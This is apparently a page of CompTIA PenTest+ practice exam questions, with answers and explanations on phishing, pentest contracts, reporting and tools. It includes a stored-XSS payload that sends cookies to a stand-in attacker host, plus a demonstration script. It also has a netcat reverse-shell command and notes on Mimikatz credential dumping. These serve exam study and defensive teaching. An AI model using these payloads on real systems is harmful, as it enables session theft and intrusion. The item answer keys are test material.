CompTIA PenTest+ Exam Questions

Page 2 of 25

21.

Through reconnaissance, an attacker has identified a group of top-ranking managers in their targeted organization. Their next move is to send all of them a specially crafted email that contains a malicious attachment in the form of an Excel financial report. 

Which of the following BEST describes the type of attack they are conducting?

  • Whaling

  • Spear phishing

  • XSS

  • CSRF

Correct answer: Whaling

Whaling is spear phishing aimed at executives and other high-value targets: members of an organization whose credentials and access could cause catastrophic damage to the business if compromised. A "financial report" lure sent to senior managers is a typical whaling pretext.

Spear phishing also refers to targeted phishing, but because the question specifically states that the attacker is targeting high-ranking managers, whaling describes the attack more precisely. XSS and CSRF are web application attacks, not social engineering.

22.

What is the primary reason why a pentester would recommend a client implement mandatory vacations?

  • To detect fraudulent activity hidden by employees

  • To ensure that employees are well-rested

  • To help increase employee satisfaction

  • To make sure that the company complies with local labor laws

Correct answer: To detect fraudulent activity hidden by employees

Mandatory vacations force someone else to cover a role for a period, which gives the organization a chance to verify that the employee's work is being done properly and surfaces fraud that depends on the perpetrator being present every day to conceal it. It also gives other employees the opportunity to learn that job role.

Employee health, satisfaction, and labor laws are not areas of expertise for pentesters.

23.

In which of the following situations would a pentester contact their emergency contact?

  • When a pentester discovers evidence of an ongoing threat

  • When a pentester needs to discuss contract terms

  • When a pentester is ready to deliver their final report

  • When a pentester needs access to a cloud management console

Correct answer: When a pentester discovers evidence of an ongoing threat

Pentesters need to have primary, technical, and emergency contacts. Emergency contacts are needed if the pentester discovers an ongoing or imminent threat.

Primary contacts are used when a pentester needs to discuss contract terms or when a pentester is ready to deliver their final report. 

Technical contacts are used when a pentester needs access to a cloud management console.

24.

An attacker found a SQL injection vulnerability on a targeted website. The SQL injection allows them to update the SQL database. One of the strings that the attacker injects into the database is as follows:

<img src=x onerror=this.src='https://evilsite.example.com/?c='+document.cookie>

What is the attacker attempting in ADDITION to the SQL injection?

  • Stored XSS

  • Lateral movement

  • Pass-the-hash

  • Reflected XSS

Correct answer: Stored XSS

They are attempting a stored, or persistent, XSS attack: the payload is written into the database by the injection and executes later in the browser of whoever views a page that renders that row, for example an administrative user reviewing records through a web interface. Because src=x cannot load, the onerror handler runs and rewrites the image source to the attacker's URL with document.cookie appended, so the viewer's cookies, including any session token, are exfiltrated in the resulting image request. Two caveats a tester should report alongside this: cookies set with the HttpOnly flag are not exposed through document.cookie, and the fix is context-appropriate output encoding wherever the stored value is rendered, not just input filtering at the injection point.

Lateral movement is a technique for moving to a different system on a network. Pass-the-hash is a technique for authenticating with a captured NTLM hash instead of the password. A reflected XSS payload is delivered in the request and echoed back in the response; it is not stored in a database.
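To make the stored XSS mechanics concrete, the following added example (not part of the original question set) renders the injected string the way a vulnerable admin page would and the way a hardened one would, and shows why the HttpOnly flag limits what the payload can steal. The "comment" wrapper markup, the sample Set-Cookie values, and the listener's access-log line are constructed for the illustration.

```python
import html
import urllib.parse

# The string from the question, as it would sit in a database row after the
# UPDATE-capable SQL injection (constructed sample, not real data).
STORED_PAYLOAD = (
    "<img src=x onerror=this.src="
    "'https://evilsite.example.com/?c='+document.cookie>"
)

WRAPPER_OPEN = "<div class='comment'>"
WRAPPER_CLOSE = "</div>"


def render_vulnerable(stored_value: str) -> str:
    """Admin page that interpolates the database value straight into HTML.
    A browser parses the <img> tag, fails to load src=x and runs onerror."""
    return f"{WRAPPER_OPEN}{stored_value}{WRAPPER_CLOSE}"


def render_hardened(stored_value: str) -> str:
    """Same page with output encoding for the HTML-body context. The row in
    the database is unchanged; it just can no longer be parsed as markup."""
    return f"{WRAPPER_OPEN}{html.escape(stored_value, quote=True)}{WRAPPER_CLOSE}"


def body_contains_tag(rendered: str) -> bool:
    """Illustrative check: is there a raw '<' left inside the wrapper that a
    browser would treat as the start of a tag?"""
    inner = rendered[len(WRAPPER_OPEN):-len(WRAPPER_CLOSE)]
    return "<" in inner


def cookie_readable_by_script(set_cookie_value: str) -> bool:
    """document.cookie only exposes cookies set without HttpOnly, so the
    exfiltration only captures the session if that flag is missing."""
    attributes = [a.strip().lower() for a in set_cookie_value.split(";")[1:]]
    return "httponly" not in attributes


def decode_exfil_request(request_line: str) -> dict:
    """What the attacker's listener sees when the handler fires: the stolen
    cookie string arrives as the 'c' query parameter of an image request."""
    path = request_line.split()[1]
    query = urllib.parse.urlparse(path).query
    return dict(urllib.parse.parse_qsl(query))


if __name__ == "__main__":
    print(render_vulnerable(STORED_PAYLOAD))
    print(render_hardened(STORED_PAYLOAD))
    # Constructed access-log line on evilsite.example.com after an admin viewed the row.
    print(decode_exfil_request("GET /?c=PHPSESSID%3Dabc123 HTTP/1.1"))
```

The hardened renderer leaves the attacker's text visible on the page (an auditor can still see what was injected) but neutralizes it; the HttpOnly check is the quick way to tell the client whether the session cookie in question was actually exposed to this payload.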

25.

What is this command used for?

nc <ip> <port> -e cmd.exe

  • To create a reverse shell on a Windows host

  • To send a file from a Windows host

  • To disable cmd.exe in a remote Windows host

  • To use netcat as a port scanner

Correct answer: To create a reverse shell on a Windows host

The nc tool can attach a program's standard input and output to a network connection. With nc <ip> <port> -e cmd.exe, the command is run on the target, which connects out to the attacker's listener (for example, nc -lvnp <port> on the attacker's machine) and hands cmd.exe that connection, giving the attacker an interactive shell. Because the connection originates from the target and goes back to the attacker, this is a reverse shell; the same option on a listening nc on the target (nc -lvp <port> -e cmd.exe) would instead be a bind shell. Note that -e only exists in netcat builds compiled with GAPING_SECURITY_HOLE (the traditional Windows nc.exe included) and in Ncat as -e/--exec; the OpenBSD nc shipped with many Linux distributions does not have it.

26.

A pentester has gained access to a single system account for an organization they are performing a penetration test on. They are focusing on gaining higher privileges than they currently have. 

Which of the following are they trying to accomplish?

  • Vertical escalation attack

  • Horizontal escalation attack

  • Directory traversal

  • Persistence

Correct answer: Vertical escalation attack

Privilege escalation is usually categorized into two types: vertical escalation and horizontal escalation. Vertical escalation attacks focus on gaining higher privileges.

Horizontal escalation moves sideways to other accounts that have the same level of privileges. Directory traversal involves reading files and directories outside of a web server's document root. Persistence means establishing a way to regain access to the target system at a later time.

27.

A pentest has determined that employees are susceptible to phishing attempts. Sometimes, mail spam filters and other security measures are a step behind the new phishing trends. 

What is another very effective way to lower the success rate of phishing attacks that a pentester should recommend as mitigation in their final report?

  • Employee security awareness training

  • Phishing filters on IDS and IPS

  • Hiding email addresses from public records

  • Disabling mail service

Correct answer: Employee security awareness training

Regular security awareness training could help the employees properly identify phishing emails. 

A social engineering test can provide information about employee behavior, policy compliance and enforcement, and security awareness, in addition to the information and access that it may provide through an organization’s security boundaries. If employees are well-trained to recognize malicious emails, this information could be protected.

28.

What is a good reason for conducting a retest after submitting the final report to the client?

  • To verify the effectiveness of a remediation effort

  • To learn additional information that can be useful in subsequent pentest projects

  • To ensure that the original test was performed correctly

  • To run the test live in front of stakeholders

Correct answer: To verify the effectiveness of a remediation effort

A client may ask for a retest after delivery of the report to test remediation efforts. For simple tests, the pentester can perform them free of charge based on their discretion.

29.

Which of the following topics is NOT typically part of a statement of work (SOW)?

  • Non-disclosure agreement

  • Scope of work

  • Payment schedule

  • Location of work

Correct answer: Non-disclosure agreement

A statement of work (SOW) is a key document for your penetration testing project. If you are at the stage of executing an SOW, it should mean that you have completed your vetting process and will be locking in your penetration testing vendor.

Key items in a penetration testing SOW:

  • Scope
  • Deliverables
  • Price
  • Completion date
  • Location of work
  • Payment schedule

A non-disclosure agreement (NDA) is typically a separate document and only covers the confidentiality of the information owned by the organization.

30.

A pentester wants to learn about current tactics, techniques, and strategies of adversaries. Which resource can they consult to get a general understanding of how incidents occurred across a wide variety of system types and how those incidents were mitigated?

  • MITRE ATT&CK framework

  • OWASP

  • PTES

  • OSSTMM

Correct answer: MITRE ATT&CK framework

The ATT&CK framework is a knowledge base of adversary tactics and techniques observed in real intrusions, organized into matrices (Enterprise, Mobile, ICS) and annotated with the detections and mitigations that apply to each technique. It is not a complete penetration testing methodology, however.

OWASP focuses on web application security. PTES (the Penetration Testing Execution Standard) defines the phases of an engagement. OSSTMM (the Open Source Security Testing Methodology Manual) is a security testing methodology.

31.

During reconnaissance, a pentester decides to use the following plugin/module to collect emails from a host:

"auxiliary/gather/search_email_collector"

Which tool are they using?

  • Metasploit

  • Burp

  • ZAP

  • Nmap

Correct answer: Metasploit

Metasploit is a powerful framework consisting of many modules. Auxiliary modules are scanners, fuzzers, and other non-exploit tools. This one takes a target domain and queries public search engines for email addresses on it, which is useful for automated information gathering during a penetration test.

Burp and ZAP are for web application scanning. Nmap is a network scanner.

32.

A pentester is performing a penetration test, and they manage to gain access to a Windows host. 

What tool should they consider using in order to extract credentials from the Windows host?

  • Mimikatz

  • netcat

  • WMIC

  • PowerShell

Correct answer: Mimikatz

Mimikatz is a leading post-exploitation tool that extracts credentials from a Windows host: plaintext passwords and NTLM hashes from LSASS memory, PINs, and Kerberos tickets. It also implements the attacks those credentials enable, such as pass-the-hash, pass-the-ticket, and golden tickets, which makes post-exploitation lateral movement within a network easy for attackers. Running it requires local administrator (SeDebugPrivilege) or SYSTEM on the host, and it is detected by most antivirus and EDR products, so a tester should expect it to be flagged.

The netcat utility is for reading from and writing to network connections using TCP or UDP. The Windows Management Instrumentation Command line (WMIC) is a software utility that allows users to perform Windows Management Instrumentation (WMI) operations with a command prompt. PowerShell is a task automation and configuration management framework from Microsoft, consisting of a command-line shell and associated scripting language.

33.

What remediation would help in the following situation? 

An attacker uses fraudulent emails to request a wire transfer.

  • Implementation of a new process

  • Implementation of new firewall rules

  • Implement an intrusion detection system 

  • Encryption of data in transit

Correct answer: Implementation of a new process

The client might implement a new process that lays out specific approved techniques for requesting wire transfers, for example out-of-band confirmation of every request by phone to a number on file and a second approver above a set amount, thus removing ambiguity. Firewall rules, an IDS, and encryption in transit do not address a fraudulent request that arrives through the normal email channel and is acted on by a person.

34.

Which of the following tools is used by a pentester for caller ID spoofing?

  • Viproy

  • BeEF

  • Authority

  • Needle

Correct answer: Viproy

Viproy is a pentesting tool for testing VoIP systems. It includes modules for the Session Initiation Protocol (SIP), including crafting SIP requests with a spoofed From header, which is where the displayed caller ID comes from.

The Browser Exploitation Framework (BeEF) is used for exploiting vulnerabilities in browsers.

Authority is a method of influence in social engineering.

Needle is a framework for testing the security of iOS applications.

35.

You have prepared detailed statistical data about the threats and vulnerabilities in your client's industry sector. Your goal is to provide your client with a clearer understanding of their security posture in comparison with similar companies. 

In which section of the report would you put this information so that it would be noted by everyone who reads it?

  • Conclusion

  • Findings and remediation

  • Appendix

  • Methodology

Correct answer: Conclusion

The conclusion is where you would provide a summary and make recommendations for future work. You might also include metrics and measures that help put the information presented in the report in the context of the organization or a peer group of similar organizations, or in a global context.

The findings and remediation section includes details about vulnerabilities and possible solutions. The appendix section can include code and glossary terms. The methodology section includes tools and techniques used.

36.

A pentester wants to enumerate unadvertised files and folders on a web server. 

Which tool is designed for this functionality?

  • Gobuster

  • OWASP ZAP

  • Kismet

  • BeEF

Correct answer: Gobuster

Gobuster is similar to DirBuster but is written in Go. Its dir mode brute-forces file and directory names on a web server from a wordlist supplied with -w (it ships no wordlist of its own), and it also has dns and vhost modes for subdomain and virtual host enumeration.

OWASP ZAP is a web application security scanner but does not brute-force directory and file names by default. 

Kismet is a wireless network detector and packet analyzer. 

BeEF is a browser exploitation framework.

37.

While pentesting for a client, you notice that one of the vulnerability scanning tools could be fine-tuned to produce more comprehensive results. 

At what stage of the pentest should you share your ideas?

  • Lessons learned

  • Follow-up actions and retesting

  • Post-engagement cleanup

  • Client acceptance

Correct answer: Lessons learned

The lessons learned session is an internal meeting of the pentesting team held after a pentest is completed. In this session, the team discusses what worked, what did not, and ways to improve the testing service they provide, which is where a tool tuning idea like this belongs.

Follow-up actions and retesting involves conducting additional tests. Post-engagement cleanup can include removing any tools or changes made during the tests. Client acceptance is formal acknowledgment from the client that they received the report.

38.

What is the purpose of the following PowerShell cmdlet?

Get-WmiObject -Query "SELECT * FROM Win32_Product"

  • To retrieve information about software products installed on the system

  • To list scheduled tasks

  • To view all running processes

  • To display information about active network connections

Correct answer: To retrieve information about software products installed on the system

The Get-WmiObject cmdlet retrieves WMI information, such as installed software and hardware. The query selects all properties of every instance of the Win32_Product class, which lists software installed through Windows Installer (MSI). Two caveats: enumerating Win32_Product makes Windows Installer run a consistency check and repair on every listed package, which is slow and noisy in the Application event log, and Get-WmiObject is not available in PowerShell 7, where Get-CimInstance -ClassName Win32_Product returns the same data.

The Get-ScheduledTask cmdlet is used to list scheduled tasks.

The Get-Process cmdlet is used to view all running processes.

netstat -ano is a command-line utility rather than a cmdlet; it displays network connections along with the owning process IDs. The PowerShell equivalent is Get-NetTCPConnection.

39.

How should a situation be addressed in which the machines you were targeting for your client's pentest were hosted by another entity?

  • Approval would usually need to be acquired from the hosting company or the cloud provider

  • Approval does not need to be granted as long as the assets belong to your client

  • Approval is required only if the assets were hosted in specific countries

  • If the client approves it, then there is no additional need for approval

Correct answer: Approval would usually need to be acquired from the hosting company or the cloud provider

If the targets are hosted in a third-party environment, such as a cloud service provider (CSP), testing is subject not only to the client's policies but also to the third party's acceptable use and penetration testing policies. Amazon Web Services (AWS), for instance, historically required tenants to submit a penetration testing request form before testing to or from any AWS resource; AWS now permits testing of a defined list of its own services without prior approval, but anything outside that list (simulated denial of service in particular) still needs authorization, and other hosting providers have their own rules. Confirm the provider's current policy during scoping and keep the evidence of authorization with the engagement paperwork.

40.

Which of the following sqlmap commands is incorrect and will NOT work?

  • sqlmap.py --host "https://example.com/article.php?id=16" --dbms=MYSQL

  • sqlmap.py -u "https://example.com/article.php?id=16" --dbms=MYSQL

  • sqlmap.py -u "https://example.com/article.php?id=16"

  • sqlmap.py -u "https://example.com/article.php?id=16" --dbms=MYSQL  --level=3 --risk=3

Correct answer: sqlmap.py --host "https://example.com/article.php?id=16" --dbms=MYSQL 

When running sqlmap, the one thing you must provide is a target; the -u flag takes the target URL (other ways to supply one are -r for a captured request file, -l for a proxy log, -m for a file of URLs, and -g for a Google dork). Without any of these, sqlmap exits with an error for a missing mandatory option, which is why the first command fails. --host is also a legitimate flag, but it sets the HTTP Host header value rather than the target. The remaining options are all valid: --dbms pins the back-end DBMS so sqlmap skips fingerprinting, and --level (1 to 5) and --risk (1 to 3) widen the set of injection points and payloads tried.